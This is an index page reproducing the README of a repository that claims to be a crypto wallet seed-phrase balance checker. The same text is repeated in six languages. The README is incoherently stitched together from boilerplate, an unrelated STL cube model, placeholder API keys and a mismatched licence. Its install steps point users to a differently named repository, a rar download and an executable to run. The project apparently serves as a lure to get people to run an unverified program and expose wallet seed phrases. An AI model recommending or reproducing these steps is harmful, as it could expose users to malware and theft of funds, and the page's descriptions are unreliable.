Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/cristinemirror/zyra-crypto-wallet-mnemonic-seed-phrase-balance-checker

This repository features Zyra, a crypto wallet tool that includes functionality for checking balances using mnemonic seed phrases. It allows you to securely manage and verify cryptocurrency balances associated with various wallets.
https://github.com/cristinemirror/zyra-crypto-wallet-mnemonic-seed-phrase-balance-checker

balance balance-checker bip39 bitecoin blockchain cold-wallet crypto crypto-wallet cryptography ethereum hardware-wallet keypair mnemonic mnemonic-phrase seed seed-phrase wallet wallet-checker

Last synced: about 1 hour ago
JSON representation

This repository features Zyra, a crypto wallet tool that includes functionality for checking balances using mnemonic seed phrases. It allows you to securely manage and verify cryptocurrency balances associated with various wallets.

Awesome Lists containing this project

README

        

## EN

















Building System Applications with C# & C++ 🚀

## README LANGUAGE


LANGUAGES!



ENGLISH
ARABIC
CHINESE
FRENCH
PORTUGuESE
TURKISH



---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## Read About
A Seed Checker is a tool used to verify the accuracy and validity of cryptocurrency seed phrases. It ensures that the seed phrase is correctly written down and can be used to recover a wallet if needed. By cross-referencing with checksums or using mnemonic phrase validation algorithms, a Seed Checker helps users avoid errors and ensure the security of their cryptocurrency holdings.

#### **Please ReaD First What You Need Part.**
####

(WHAT YOU NEED)

https://github.com/df123hh/photo/assets/171132664/ae5ca938-e1d4-4023-8cb8-6cb04d547768

![main3](https://github.com/df123hh/photo/assets/171132664/d3fb8de2-00cb-4c93-801a-a2f376e911a0)

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(back to top)

## Roadmap

- [ ] New Gui
- [x] Add back to top links
- [ ] Add Additional Templates w/ Examples
- [ ] New Features
- [x] Multi-language Support
- [x] Chinese
- [x] Turkish
- [x] French
- [x] Spanish

(back to top)

## Getting Started

### Prerequisites

This is an example of how to list things you need to use the software and how to install them.
* npm
```sh
npm install npm@latest -g
```

### Installation

1. Download Visual Studio 2022
_using Git Clone Or either download the project or exit the rar. Then Download Visual Studio 2022 Here Link [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Download These

2. Clone the repo
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OR

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _Then open the sln (Project Solution) file_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. Find Executable File
```sh
/ProjectName/Bin/Debug/Executable.exe
```

(back to top)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(back to top)

## Contributing











(back to top)


Preview

Not sure where to start? Join our discord and we will help you get started!

(back to top)


snake

## AR

















بناء تطبيقات النظام باستخدام C# وC++ 🚀

## اللغة التمهيدية


اللغات!



إنجليزي
ARABIC
صينى
فرنسي
البرتغالية
اللغة التركية


---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## أقرأ عن
مدقق البذور هو أداة تستخدم للتحقق من دقة وصحة العبارات الأولية للعملات المشفرة. فهو يضمن كتابة العبارة الأولية بشكل صحيح ويمكن استخدامها لاستعادة المحفظة إذا لزم الأمر. من خلال الإسناد الترافقي مع المجاميع الاختبارية أو استخدام خوارزميات التحقق من صحة العبارة ذاكري، يساعد مدقق البذور المستخدمين على تجنب الأخطاء وضمان أمان مقتنياتهم من العملات المشفرة.

#### **يرجى قراءة الجزء الأول الذي تحتاجه.**
####

(ماذا تحتاج)

https://github.com/df123hh/photo/assets/171132664/ae5ca938-e1d4-4023-8cb8-6cb04d547768

![main3](https://github.com/df123hh/photo/assets/171132664/d3fb8de2-00cb-4c93-801a-a2f376e911a0)

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(العودة إلى الأعلى)

## خريطة الطريق

- [ ] جديد Gui
- [x] أضف العودة إلى الروابط العليا
- [ ] أضف قوالب إضافية مع أمثلة
- [ ] جديد سمات
- [x] دعم متعدد اللغات
- [x] صينى
- [x] اللغة التركية
- [x] فرنسي
- [x] الأسبانية

(العودة إلى الأعلى)

## ابدء

### المتطلبات الأساسية

هذا مثال لكيفية إدراج الأشياء التي تحتاجها لاستخدام البرنامج وكيفية تثبيتها.
* npm
```sh
npm install npm@latest -g
```

### تثبيت

1. تحميل Visual Studio 2022
_باستخدام Git Clone أو إما تنزيل المشروع أو الخروج من ملف rar. ثم قم بتنزيل Visual Studio 2022 هنا الرابط [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> قم بتنزيل هذه

2. استنساخ الريبو
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. أو

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _ثم افتح sln (Project Solution) ملف_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. ابحث عن الملف القابل للتنفيذ
```sh
/ProjectName/Bin/Debug/قابل للتنفيذ (. EXE
```

(العودة إلى الأعلى)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(العودة إلى الأعلى)

## المساهمة











(العودة إلى الأعلى)


Preview

لست متأكدا من أين تبدأ؟ انضم إلى خلافنا وسنساعدك على البدء!

(العودة إلى الأعلى)


snake

## License

جزء كبير من هذا المشروع مرخص بموجب [Apache 2.0](./LICENSE) license. الاستثناء الوحيد هو المكونات الموجودة تحت `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.

## CH

















使用 C# 和 C++ 构建系统应用程序 🚀

## 自述文件语言


语言!



英语
阿拉伯
CHINESE
法语
葡萄牙语
土耳其


---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## 阅读
种子检查器是一种用于验证加密货币种子短语的准确性和有效性的工具。它确保种子短语被正确记录,并且可以在需要时用于恢复钱包。通过交叉引用校验和或使用助记词验证算法,种子检查器可以帮助用户避免错误并确保其加密货币资产的安全。

#### **请先阅读您需要的部分。**
####

(您需要什么)

https://github.com/df123hh/photo/assets/171132664/ae5ca938-e1d4-4023-8cb8-6cb04d547768

![main3](https://github.com/df123hh/photo/assets/171132664/d3fb8de2-00cb-4c93-801a-a2f376e911a0)

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(回到顶部)

## 路线图

- [ ] 新的 Gui
- [x] 添加返回顶部链接
- [ ] 添加附加模板和示例
- [ ] 新的 特征
- [x] 多语言支持
- [x] 中国人
- [x] 土耳其
- [x] 法语
- [x] 西班牙语

(回到顶部)

## 入门

### 先决条件

这是如何列出使用该软件所需的东西以及如何安装它们的示例。
* npm
```sh
npm install npm@latest -g
```

### 安装

1. 下载 Visual Studio 2022
_使用 Git Clone 或者下载项目或退出 rar。然后在此处下载 Visual Studio 2022 链接 [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> 下载这些

2. 克隆存储库
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OR

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _然后打开sln (Project Solution) file_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. 查找可执行文件
```sh
/ProjectName/Bin/Debug/Executable.exe
```

(回到顶部)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(回到顶部)

## 贡献











(回到顶部)


Preview

不知道从哪里开始?加入我们的discord,我们将帮助您开始!

(回到顶部)


snake

## 执照

该项目的很大一部分是根据 [Apache 2.0](./LICENSE) 执照。唯一的例外是下面的组件 `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.

## FR

















Création d'applications système avec C# et C++ 🚀

## LANGUE README


LANGAGES!



ANGLAIS
ARABE
CHINOIS
FRANÇAIS
Portugais
TURC


---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## Lire à propos
Un Seed Checker est un outil utilisé pour vérifier l’exactitude et la validité des phrases de départ de crypto-monnaie. Il garantit que la phrase de départ est correctement écrite et peut être utilisée pour récupérer un portefeuille si nécessaire. En croisant des sommes de contrôle ou en utilisant des algorithmes de validation de phrases mnémoniques, un Seed Checker aide les utilisateurs à éviter les erreurs et à assurer la sécurité de leurs avoirs en crypto-monnaie.

#### **Veuillez lire d'abord la pièce dont vous avez besoin.**
####

(DE QUOI AS-TU BESOIN)

https://github.com/df123hh/photo/assets/171132664/ae5ca938-e1d4-4023-8cb8-6cb04d547768

![main3](https://github.com/df123hh/photo/assets/171132664/d3fb8de2-00cb-4c93-801a-a2f376e911a0)

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```

### What You Need
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(retour au sommet)

## Feuille de Route

- [ ] Nouvelle Gui
- [x] Ajouter des liens vers le haut
- [ ] Ajouter Des Modèles Supplémentaires avec des Exemples
- [ ] Nouvelles Fonctionnalités
- [x] Prise en charge multilingue
- [x] Chinois
- [x] Turc
- [x] Français
- [x] Espagnol

(retour au sommet)

## Pour Commencer

### Prérequis

Ceci est un exemple de la façon de répertorier les éléments dont vous avez besoin pour utiliser le logiciel et de les installer.
* npm
```sh
npm install npm@latest -g
```

### Montage

1. Télécharger Visual Studio 2022
_en utilisant Git Clone Ou téléchargez le projet ou quittez le rar. Ensuite, Téléchargez Visual Studio 2022 Ici Lien [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Téléchargez-Les

2. Cloner le dépôt
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OU

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _Ensuite, ouvrez le sln (Project Solution) file_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. Trouver un Fichier Exécutable
```sh
/ProjectName/Bin/Debug/Executable.exe
```

(retour au sommet)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(retour au sommet)

## Contribuant











(retour au sommet)


Preview

Vous ne savez pas par où commencer? Rejoignez notre discorde et nous vous aiderons à démarrer!

(retour au sommet)


snake

## Licence

A large part of this project is licensed under the [Apache 2.0](./LICENSE) license. The only exception are the components under the `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.

## PR

















Construindo aplicativos de sistema com C# e C++ 🚀

## IDIOMA LEIA-ME


LÍNGUAS!



INGLÊS
ÁRABE
CHINÊS
FRANCÊS
Português
TURCO


---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## Ler sobre
Um verificador de sementes é uma ferramenta usada para verificar a precisão e validade de frases iniciais de criptomoeda. Ele garante que a frase inicial seja escrita corretamente e possa ser usada para recuperar uma carteira, se necessário. Ao fazer referência cruzada com somas de verificação ou usar algoritmos de validação de frases mnemônicas, um Seed Checker ajuda os usuários a evitar erros e garantir a segurança de seus acervos de criptomoedas.

#### **Por favor, leia primeiro o que você precisa.**
####

(O QUE VOCÊ PRECISA)

https://github.com/df123hh/photo/assets/171132664/ae5ca938-e1d4-4023-8cb8-6cb04d547768

![main3](https://github.com/df123hh/photo/assets/171132664/d3fb8de2-00cb-4c93-801a-a2f376e911a0)

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(de volta ao topo)

## Roadmap

- [ ] Novo Gui
- [x] Adicionar links de volta ao topo
- [ ] Adicione modelos adicionais com exemplos
- [ ] Novo Features
- [x] Suporte multilíngue
- [x] chinês
- [x] Turco
- [x] Francês
- [x] Espanhol

(de volta ao topo)

## Começando

### Pré-requisitos

Este é um exemplo de como listar os itens necessários para usar o software e como instalá-los.
* npm
```sh
npm install npm@latest -g
```

### Instalação

1. Download Visual Studio 2022
_usando Git Clone Ou baixe o projeto ou saia do rar. Então baixe o Visual Studio 2022 aqui link [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Baixe estes

2. Clonar o repositório
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OR

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _Então abra o sln (Project Solution) arquivo_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. Encontre o arquivo executável
```sh
/ProjectName/Bin/Debug/Executable.exe
```

(de volta ao topo)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(de volta ao topo)

## Contribuindo











(de volta ao topo)


Preview

Não sabe por onde começar? Junte-se ao nosso discord e nós o ajudaremos a começar!

(de volta ao topo)


snake

## Licença

Grande parte deste projeto está licenciada sob o [Apache 2.0](./LICENSE) license. A única exceção são os componentes sob o `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.

## TR

















C# ve C++ ile Sistem Uygulamaları Oluşturuyorum. 🚀

## README Dil


DİLLER!



İNGİLİZCE
ARAPÇA
ÇİNCE
FRANSIZCA
Portekizce
TÜRKÇE


---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## Hakkında oku
Tohum Denetleyicisi, kripto para tohum ifadelerinin doğruluğunu ve geçerliliğini doğrulamak için kullanılan bir araçtır. Başlangıç ​​ifadesinin doğru bir şekilde yazılmasını ve gerektiğinde cüzdanı kurtarmak için kullanılmasını sağlar. Sağlama toplamlarıyla çapraz referans vererek veya anımsatıcı ifade doğrulama algoritmaları kullanarak bir Seed Checker, kullanıcıların hatalardan kaçınmasına ve kripto para varlıklarının güvenliğini sağlamasına yardımcı olur.

#### **Lütfen Önce Neye İhtiyacınız Var Kısmını Okuyun.**
####

(NEYE İHTİYACIN VAR)

https://github.com/df123hh/photo/assets/171132664/ae5ca938-e1d4-4023-8cb8-6cb04d547768

![main3](https://github.com/df123hh/photo/assets/171132664/d3fb8de2-00cb-4c93-801a-a2f376e911a0)

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### NE GEREKİYOR.
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(Başa Dönüş)

## Yol Haritası(HEDEFLER)

- [ ] Yeni Gui
- [x] Başa dön bağlantılarına ekle
- [ ] Örneklerle Ek Şablonlar Ekleme
- [ ] Yeni özellikler
- [x] Çoklu Dil Desteği
- [x] Çince
- [x] Türkçe
- [x] Fransızca
- [x] İspanyol

(Başa Dönüş)

## Öncelikle

### Önkoşullar

Bu, yazılımı kullanmak için ihtiyaç duyduğunuz şeylerin nasıl listeleneceğine ve bunların nasıl kurulacağına ilişkin bir örnektir.
* npm
```sh
npm install npm@latest -g
```

### Kurulum

1. Download Visual Studio 2022
_Git Clone'u kullanarak Veya projeyi indirin veya rar'dan çıkın. Ardından Visual Studio 2022'yi Buradan İndirin Bağlantı [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Bunları İndir

2. Depoyu klonla
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. Veya

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _Daha sonra Sln Dosyasini Acin (Project Solution) file_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. Yürütülebilir Dosyayı Bul
```sh
/ProjectName/Bin/Debug/Executable.exe
```

(Başa Dönüş)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(Başa Dönüş)

## Katkı











(Başa Dönüş)


Preview

Nereden başlayacağınızdan emin değil misiniz? Discordumuza katılın ve başlamanıza yardımcı olalım!

(Başa Dönüş)


snake

## Lisans

Bu projenin büyük bir kısmı lisanslıdır. [Apache 2.0](./LICENSE) lisans. Bunun tek istisnası, aşağıdakiler kapsamındaki bileşenlerdir: `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.